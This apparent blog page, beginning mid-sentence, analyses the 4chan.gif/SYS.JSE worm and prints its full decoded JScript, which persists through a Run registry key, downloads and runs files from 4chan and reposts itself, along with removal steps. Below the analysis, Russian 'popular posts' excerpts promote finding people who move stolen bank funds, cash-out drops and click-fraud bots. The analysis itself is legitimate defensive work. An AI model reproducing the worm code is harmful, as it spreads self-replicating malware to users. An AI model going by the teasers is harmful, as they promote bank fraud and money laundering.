Skip to main content

Obfuscated 4chan.gif/Invasion.gif/SYS.JSE Decoded and Removal

t of encoding it was using, and folks pointed me to the post at the SAN Internet Storm Center:
But that had few detail on how the encoding was done. Byte_Bucket from Pauldotcom pointed me at a tool called "Windows Script Encoder" from Microsoft that seems to be what was used. After doing some checking, the encoded part of the JSE starts with #@~^ , which is also what the MS tool creates.


Once I knew Windows Script Encoder was used, I Google around for a decoder. This site:
pointed me at a JSE decoder you can find here:
http://www.virtualconspiracy.com/content/scrdec/download

and it seems to work. Rather than explain what the script does in great detail you can just read the source here:
GIF89aI = "x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");

"‰";
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
"è";
xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
part1.close();

var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

try {
ie.navigate("http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }
It seems the end point was just to spam 4chan and ban the user as a result. Cleanup and removal is about as simple as
1. Kill the wscript process
2. Removing the registry entry at: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sysjse or just use MSConfig to remove it from start up.
3. Remove sys.jse from your temp directory (Most likely something similar to c:\Documents and Settings\YouUserName\Local Settings\Temp ).
For more info on this Malware, check out:

Comments

Popular posts from this blog

Как найти реального заливщика

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли?


Ко мне начал обращаться народ обращается разных категорий

1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса 
2. Реальные мэны, которые льют сразу большую сумму по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личности, берущие реквизиты …

Новые онлайн-игры с выводом денег

Одним из видов получения стабильного сетевого дохода является заработок в он-лайн играх, с выводом денег через электронные платежные системы, такие как Яндекс.Деньги или Webmoney или через любые другие электронные платёжные системы. Причем, способов заработать на играх в интернете существует несколько, и зарабатывать таким образом можно довольно внушительные суммы.




Как правильно играть на деньги в онлайн играх
1. Играть самому, без каких-либо денежных вложений в игру. Такой способ заработка занимает довольно много времени, а доход приносит весьма скромный. К тому же, в некоторых онлайн играх с выводом средств зарабатывать подобным способом просто невозможно, так как игры с возможностью заработать могут являться инвестиционными проектами (финансовыми онлайн играми), которые требуют обязательных минимальных вложений.


2. Играть самому, вкладывая деньги с банковской карты. Наверное, это самый оптимальный способ заработка реальных денег в онлайн играх. Сумма дохода здесь зависит от того, ско…

Чем рискуют дропы и нальщики принимая заливы на свои карты

Зам.начальника управления Следственного департамента МВД Павел Сычев рассказал о криминальном бизнесе «нальщиков»
- Глава Банка России Эльвира Набиуллина заявила о снижении объемов теневого оборота в конце 2013 года. Что показывает ваша статистика по выявлению незаконных операций?

- В последние годы объем денежных средств, выведенных в теневой сектор, увеличивался, и криминогенная обстановка ухудшалась. Проблема находится в поле зрения президента -  в декабрьском послании Федеральному Собранию, он призвал избавить нашу финансовую систему от разного рода «отмывочных контор» и так называемых «прачечных». Оперативники уже получили ориентировку на более активное выявление этих преступлений.

По уголовным делам, расследованным МВД только в первом полугодии 2013 года, проходит 145 млрд рублей, обналиченных и незаконно выведенных заграницу. Это неуплаченные налоги, незаконный бизнес, хищения, взятки. Финансовый доход посредников от этих операций составил 8 млрд рублей. Расследовано 89 таких дел …

Залив на карту без предоплаты по SWIFT или SEPA

В последнее время наблюдается такая ситуация, что нальщиков и дропов на рынке много, а адекватных заливщиков, можно сказать, совсем нет.


Например, один мой хороший знакомый, имеющий свой собственный офшор, работает с заливщиками на условиях партнерства, предоставляя им трафик и взамен получая 20% от поведенных транзакций на свой счет в офшорном банке. Мне он рассказал по большому секрету, как такое ему удается, а начинал он как и все с малого - продажи дебетовых карт и игре на рынке FOREX.

Просто так искать Заливщиков на различных форумах, посвящённых обналу и отмыванию денег - достаточно муторное и нудное занятие, потому как после общения с десятым по счету заливщиком, начинаешь понимать, что просто так на карты и счета никто лить не будет.

Однако моему другу попался один довольно интересный вариант - Заливщик предложил сделать перевод в размере 375 000 EUR по SEPA в день предоставления готового к работе счета и активной системы Multihomed AS.



Остальные предложения были более мутные …

Black Hat SEO или бот для скликивания контекстной рекламы

На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ
Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы.  Win32/Patched.P Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET)…

Как работает банк со своими корреспондентами по SWIFT

Итак, наш банк имеет открытые корреспондентские счета в США (CITIBANK N.A. NEW YORK), в Европе (VTB BANK DEUTSCHLAND AG), в России (Промсвязьбанк Москва и Собинбанк Москва).



Соответственно, все расследования по платежам происходят через эти банки согласно  установленным корреспондентским отношениям с использованием соответствующих форматов SWIFT MT-195/295, MT-196/296, MT-199/299 и MT-192/292

Кроме прямых корреспондентских отношений с банками, нашим банком установлены отношения и с другими финансовыми организациями через процедуру обмена ключами, что даёт возможность использовать SWIFT-форматы МТ-195, МТ-196 и МТ-199 для проведения процедуры расследования по стандартным платежам и платежам с покрытием:

- DEUTSCHE BANK TRUST COMPANY AMERICAS USA
- COMMERZBANK AG Germany
- CITIBANK N.A. London
- CITIBANK N.A. Brussels
- BANQUE DE COMMERCE ET DE PLACEMENTS S.A. Geneva
- NORVIK BANKA JSC  LV
- ABLV BANK AS  LV

В среднем процедура расследования занимает от 3 до 14 дней (если необходимо уточнить дета…